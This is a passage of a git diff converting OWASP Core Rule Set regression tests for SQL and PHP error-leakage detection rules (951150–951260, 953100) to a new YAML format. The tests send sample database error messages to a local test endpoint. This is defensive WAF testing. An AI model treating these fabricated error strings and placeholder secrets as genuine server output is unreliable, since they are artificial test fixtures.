used select statements have different number of columns[/match]: Dynamic SQL Error"} - output: - log_contains: "id \"951150\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Dynamic SQL Error"} + output: + log: + expect_ids: [951150] diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml index 088e2d3..c923339 100644 --- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml +++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951160.yaml" - description: "Regression tests for rule 951160" +rule_id: 951160 tests: - - test_title: 951160-1 + - test_id: 1 desc: "Matching Frontbase SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL-status: HY000 [FrontBase Inc.][FrontBase ODBC]Semantic error 217. Datatypes are not comparable or don't match. Semantic error 485. Near: SELECT DISTINCT * FROM SALES WHERE DATE>='2014-04-01';. Semantic error 485. Near: '2014-04-01'. Exception 363. Transaction rollback."} - output: - log_contains: "id \"951160\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL-status: HY000 [FrontBase Inc.][FrontBase ODBC]Semantic error 217. Datatypes are not comparable or don't match. Semantic error 485. Near: SELECT DISTINCT * FROM SALES WHERE DATE>='2014-04-01';. Semantic error 485. Near: '2014-04-01'. Exception 363. Transaction rollback."} + output: + log: + expect_ids: [951160] diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml index 60ad4b9..85bcf4a 100644 --- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml +++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951170.yaml" - description: "Regression tests for rule 951170" +rule_id: 951170 tests: - - test_title: 951170-1 + - test_id: 1 desc: "Matching hsqldb SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: at org.hsqldb.jdbc.JDBCDriver.connect(Unknown Source)"} - output: - log_contains: "id \"951170\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: at org.hsqldb.jdbc.JDBCDriver.connect(Unknown Source)"} + output: + log: + expect_ids: [951170] diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml index 7ac83ba..57f2cdc 100644 --- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml +++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951180.yaml" - description: "Regression tests for rule 951180" +rule_id: 951180 tests: - - test_title: 951180-1 + - test_id: 1 desc: "Matching informix SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Exception in thread \"main\" java.sql.SQLException: An illegal character has been found in the statement."} - output: - log_contains: "id \"951180\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Exception in thread \"main\" java.sql.SQLException: An illegal character has been found in the statement."} + output: + log: + expect_ids: [951180] diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml index b1ca7c7..d717ef4 100644 --- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml +++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951190.yaml" - description: "Regression tests for rule 951190" +rule_id: 951190 tests: - - test_title: 951190-1 + - test_id: 1 desc: "Matching ingres SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: [5000A] [Actian][Ingres ODBC Driver][Ingres]Delimited identifier starting with '' contains no valid characters. (6692) (SQLExecDirectW)"} - output: - log_contains: "id \"951190\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: [5000A] [Actian][Ingres ODBC Driver][Ingres]Delimited identifier starting with '' contains no valid characters. (6692) (SQLExecDirectW)"} + output: + log: + expect_ids: [951190] diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml index a190b55..ee8a310 100644 --- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml +++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951200.yaml" - description: "Regression tests for rule 951200" +rule_id: 951200 tests: - - test_title: 951200-1 + - test_id: 1 desc: "Matching interbase SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Unexpected end of command in statement [SELECT * FROM INTO WHERE 'place'='xxxxxxx' AND 'yielddate' BETWEEN '01/11/2012' AND '29/11/2012''']."} - output: - log_contains: "id \"951200\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Unexpected end of command in statement [SELECT * FROM INTO WHERE 'place'='xxxxxxx' AND 'yielddate' BETWEEN '01/11/2012' AND '29/11/2012''']."} + output: + log: + expect_ids: [951200] diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml index f65083e..2823970 100644 --- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml +++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951210.yaml" - description: "Regression tests for rule 951210" +rule_id: 951210 tests: - - test_title: 951210-1 + - test_id: 1 desc: "Matching maxDB SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: maxdb_query(): -8004 POS(62) Constant must be compatible with column type and length"} - output: - log_contains: "id \"951210\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: maxdb_query(): -8004 POS(62) Constant must be compatible with column type and length"} + output: + log: + expect_ids: [951210] diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml index 18d37f4..b66b43f 100644 --- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml +++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml @@ -1,50 +1,47 @@ --- meta: author: "azurit, Xhoenix" - enabled: true - name: "951220.yaml" - description: "Regression tests for rule 951220" +rule_id: 951220 tests: - - test_title: 951220-1 + - test_id: 1 desc: "Matching mssql SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: PHP Warning: mssql_query(): message: Incorrect syntax near 's'. (severity 15) in /Volumes/Data/Users/username/Desktop/createXML.php on line 375"} - output: - log_contains: "id \"951220\"" - - - test_title: 951220-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: PHP Warning: mssql_query(): message: Incorrect syntax near 's'. (severity 15) in /Volumes/Data/Users/username/Desktop/createXML.php on line 375"} + output: + log: + expect_ids: [951220] + - test_id: 2 desc: "Matching mssql SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Conversion failed when converting the varchar value 'secret' to data type int."} - output: - log_contains: "id \"951220\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Conversion failed when converting the varchar value 'secret' to data type int."} + output: + log: + expect_ids: [951220] diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml index 972e41e..ee66a9d 100644 --- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml +++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml @@ -1,49 +1,47 @@ --- meta: author: "azurit, Xhoenix" - enabled: true - name: "951230.yaml" - description: "Regression tests for rule 951230" +rule_id: 951230 tests: - - test_title: 951230-1 + - test_id: 1 desc: "Matching MySQL SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1772 (HY000): Malformed GTID set specification 'secret_password'."} - output: - log_contains: "id \"951230\"" - - test_title: 951230-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1772 (HY000): Malformed GTID set specification 'secret_password'."} + output: + log: + expect_ids: [951230] + - test_id: 2 desc: "Matching MySQL SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1105 (HY000): XPATH syntax error: '\\secret'"} - output: - log_contains: "id \"951230\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1105 (HY000): XPATH syntax error: '\\secret'"} + output: + log: + expect_ids: [951230] diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml index f878fd1..802915f 100644 --- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml +++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml @@ -1,49 +1,47 @@ --- meta: author: "azurit, Xhoenix" - enabled: true - name: "951240.yaml" - description: "Regression tests for rule 951240" +rule_id: 951240 tests: - - test_title: 951240-1 + - test_id: 1 desc: "Matching PostgreSQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: pg_query(): supplied argument is not a valid PostgreSQL link resource in /var/www/sivusto/handler.php on line 56"} - output: - log_contains: "id \"951240\"" - - test_title: 951240-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: pg_query(): supplied argument is not a valid PostgreSQL link resource in /var/www/sivusto/handler.php on line 56"} + output: + log: + expect_ids: [951240] + - test_id: 2 desc: "Matching PostgreSQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR: invalid input syntax for integer"} - output: - log_contains: "id \"951240\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR: invalid input syntax for integer"} + output: + log: + expect_ids: [951240] diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml index f711ff8..ebc1c43 100644 --- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml +++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951250.yaml" - description: "Regression tests for rule 951250" +rule_id: 951250 tests: - - test_title: 951250-1 + - test_id: 1 desc: "Matching SQLite SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: SQLite3::query() [sqlite3.query]: 1 values for 2 columns in /mysite/product.php on line 94"} - output: - log_contains: "id \"951250\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: SQLite3::query() [sqlite3.query]: 1 values for 2 columns in /mysite/product.php on line 94"} + output: + log: + expect_ids: [951250] diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml index e8f9373..852a607 100644 --- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml +++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951260.yaml" - description: "Regression tests for rule 951260" +rule_id: 951260 tests: - - test_title: 951260-1 + - test_id: 1 desc: "Matching Sybase SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: Sybase: Server message: Changed database context to 'rdhiman'. (severity 10, procedure N/A) in guestfatch.php on line 10"} - output: - log_contains: "id \"951260\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: Sybase: Server message: Changed database context to 'rdhiman'. (severity 10, procedure N/A) in guestfatch.php on line 10"} + output: + log: + expect_ids: [951260] diff --git a/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml b/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml index d4dfc5e..18149c3 100644 --- a/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml +++ b/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml @@ -1,107 +1,105 @@ --- meta: author: "M4tteoP, Esad Cetiner, azurit" - enabled: true - name: "953100.yaml" - description: "Tests for rule 953100" +rule_id: 953100 tests: - - test_title: 953100-1 + - test_id: 1 desc: "'File size is' leads to FPs, it should not match at PL1" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - uri: "/post" - data: "Maximum allowed file size is 10 MB" - output: - no_log_contains: id "953100" - - test_title: 953100-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "Maximum allowed file size is 10 MB" + output: + log: + no_expect_ids: [953100] + - test_id: 2 desc: "'Invalid date' Wordpress FP, it should not match at PL1" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - uri: "/post" - data: "Invalid date selected" - output: - no_log_contains: id "953100" - - test_title: 953100-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "Invalid date selected" + output: + log: + no_expect_ids: [953100] + - test_id: 3 desc: "'The function' might lead to FPs, it should not match at PL1" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - uri: "/post" - data: "please review the function" - output: - no_log_contains: id "953100" - - test_title: 953100-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "please review the function" + output: + log: + no_expect_ids: [953100] + - test_id: 4 desc: "'Static function' might lead to FPs, it should not match at PL1" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - uri: "/post" - data: "This is a static function" - output: - no_log_contains: id "953100" - - test_title: 953100-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "This is a static function" + output: + log: + no_expect_ids: [953100] + - test_id: 5 desc: "'cannot be empty is too common for PL1 GH isue #3399" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - uri: "/post" - data: "Field cannot be empty." - output: - no_log_contains: id "953100" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 